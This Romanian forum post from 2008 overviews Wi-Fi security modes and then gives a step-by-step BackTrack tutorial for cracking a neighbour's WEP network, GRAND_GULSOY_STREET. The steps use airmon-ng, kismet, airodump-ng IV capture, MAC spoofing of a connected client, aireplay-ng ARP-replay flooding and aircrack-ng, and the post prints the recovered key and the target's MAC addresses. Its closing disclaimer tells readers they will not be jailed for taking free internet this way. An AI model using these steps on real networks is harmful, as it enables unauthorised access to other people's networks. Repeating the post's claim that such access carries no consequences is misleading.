
Care e cel mai sigur mod de securizare al unui router/ap ? Fara nici o discutie este RADiUS/WPA-RADiUS,dar din cauza incompatibilitatii cu placile de retea care sunt folosite in general acest mod nu prea se foloseste la securizarea retelelor.
Cele mai populare metode de criptare a retelelor wireless sunt:
Open Security
Wireless Security
WEP
WPA
RSN
RADIUS / WPA-RADIUS
Wireless Gateway
1. Open security - Este ce vedeti voi la hotspoturile free si autentificarea se face instantaneu la selectatea retelei.
2. Wireless Security - Le permite administratorilor sa creeze intrari doar pentru utilizatori. Puteti adauga ulterior mai multi utilizatori sau puteti crea conturi cu acces temporar.Conectarea la o astfel de retea se poate face doar daca clonati adresa MAC la un dispozitiv (pc,telefon,imprimanta etc) care are acces la router/ap.Schimbarea adresei MAC o puteti face cu acest program macmakeup.Despre cum aflati adresa MAC a unui dispozitiv conectat la router o sa va explic putin mai jos..........

2. WEP (wireless equivalency protocol) Foloseste pt criptarea semnalului radio IV (Initialization Vector) si in general o face pe un algoritm de 64 si 128 bit. Acest IV este punctul vulnerabil la retele criptate cu wep deoarece acest iv este trimis de fiecare data de catre AP catre dispozitiv si viceversa in cazul in care dispozitivul este unul care are acces la AP.O parola WEP este formata din litere de la A la F si cifre intre 0 si 9 si asta inseamna ca are o capacitate limitata de criptare a parolei."Strecurarea" intr-o astfel de retea se poate face foarte usor daca salvezi si decriptezi IV urile trimise de dispozitiv si AP
3.WPA (WiFi Protected Access) Parola WPA poate fi formata dintr-un numar nelimitat de caractere (cifre,litere si semne ' ^ + % & / ( ) =)si asta face acest mod de securizare oarecum sigur. Punctul vulnerabil la WPA este handshakes,adica parola necriptata care este trimisa o singura data (la autentificare) de catre dispozitiv catre Acces Point.
Acum sa dezvoltam putin subiectul si sa vedem cum se poate monitoriza,salva,decripta aceste semnale radio.

Pt moderi: stati calmi.



Ca majoritatea prostiilor care se fac pe net si chestiile astea se fac sub linux.

1.Dupa ce ati scris cd ul restartati pc ul bootand cd ul si asteptati instalarea.
2.Acum trebuie sa monitorizam placa de retea si interfata cu care vom ataca routerul si pt asta scriem in shell comanda
bt ~ # airmon-ng

Dupa cum vedeti in imginea de mai sus eu am 2 placi de retea pe laptop. Prima este placa de retea din configuratia initiala a laptopului (eth0 Broadcom bcm43xx) iar a doua este un wireless usb adaptor (rausb0 Ralink USB rt73) Eu voi lucra cu adaptorul usb (care il recomand si voua

bt ~ # airmon-ng start rausb0
si
bt ~ # ifconfig rausb0 up

FOARTE IMPORTANT! ! !
Dupa cum vedeti eu voi folosi interfata rausb0 . La voi in schimb intefata va aparea diferit in functie de placa de retea pe care o aveti pe pc(eth0,eth1,wlan0,wlan1,ath0,ath1) etc..... Binenteles ca voi veti face setarile in functie de ce veti vedea ca apare dupa comanda airmon-ng....
In fine.... ...Spargerea unui router incepe cu "ascultarea" si salvarea datelor de pe canalul pe care transmite routerul si pt asta vom folosi aplicatia KISMET
bt ~ # kismet

Acum nu trebuie decat sa alegeti tinta si sa notati canalul pe care emite. Eu am ales GRAND_GULSOY_STREET pt ca e mai aproape de mine si am semnal mai bun. Dupa cum vedeti si in imagine GRAND_GULSOY_STREET transmite pe canalu 1. Acum oprim kismet si vom incerca sa monitorizam traficul care se face pe acest canal.Pentru asta voi folosi programul airodump.
bt ~ # airodump-ng --channel 1 --write wep_mobilewave_ivs --ivs rausb0

Cu alte cuvinte aceasta comanda cam asta inseamna : "Aduna-mi toate ivs urile din pachetele care fac trafic pe canalul 1 si saveaza-le in fisierul wep_mobilewave_ivs folosind placa de retea rausb0 (adaptorul wireless usb)
Dupa cateva secunde o sa va apara in lista toate AP urile care emit pe acest canal si eventualele dispozitive conectate....
In imagine vedeti ca la AP ul GRAND_GULSOY_STREET (mac: 00:12:cf:6e:a9:77) si avem conectat un dispozitiv (00:12:f0:ac:f7:90 )care poate fi un laptop,telefon,imprimanta,webcam etc..
Daca intre AP si dispozitiv exista trafic activ nu trebuie sa facem altceva decat sa asteptam ca sa se adune cat mai mult IV pt care sa-l decriptam si sa aflam cheia hex (parola)
Aceasta asteptare poate dura si o jumatate de ora si doua zile


Dar daca nu avem destul trafic pe canal este si pt asta o solutie... Floodam Routerul

bt ~ # airmon-ng rausb0 stop
bt ~ # ifconfig rausb0 down
si schimbam adresa mac. In cazul meu 00:12:f0:ac:f7:90 care e mac ul conectat la ap
macchanger --mac 00:12:f0:ac:f7:90 rausb0

Dupa ce am schimbat adresa mac monitorizam din nou......
bt ~ # airmon-ng start rausb0
si
bt ~ # ifconfig rausb0 up
dupa care reluam ascultarea canalui 1
bt ~ # airodump-ng --channel 1 --write wep_mobilewave_ivs --ivs rausb0
si facem trafic pe server cu putin flood cu o noua comanda in shell

aireplay-ng --arpreplay -b 00:12:cf:6e:a9:77 -h 00:12:f0:ac:f7:90 rausb0

si incet incet ne apropiem de final

aircrack-ng -a 1 -b 00:12:cf:6e:a9:77 wep_mobilewave_ivs-01.ivs
In prima imagine e un rateu pt nu am avut adunate destule pachete dar in a doua bingo

Parola la ap ul GRAND_GULSOY_STREET este 2125125965


aaaaa si sa nu uit. Nu folositi backtrack in scopuri ilegale pt ca oricat de destepti ati fi in cele din urma veti fi prinsi. Chiar acum am citit o stire despre Vladutz,copilul care a pus baza de date de la e-bay pe chituci. Chiar daca nu e prea ortodox ce v-am scris eu mai sus va garantez eu ca nu o sa va bage nimeni la bulau pt ca sunteti amarasteni si v-ati conectat la un ap pt internet moka


Pacat de baiat pt ca era destept si acum trebuie sa stea la racoare cativa ani.....

Edited by Mishulica at 08-06-2008, 17:13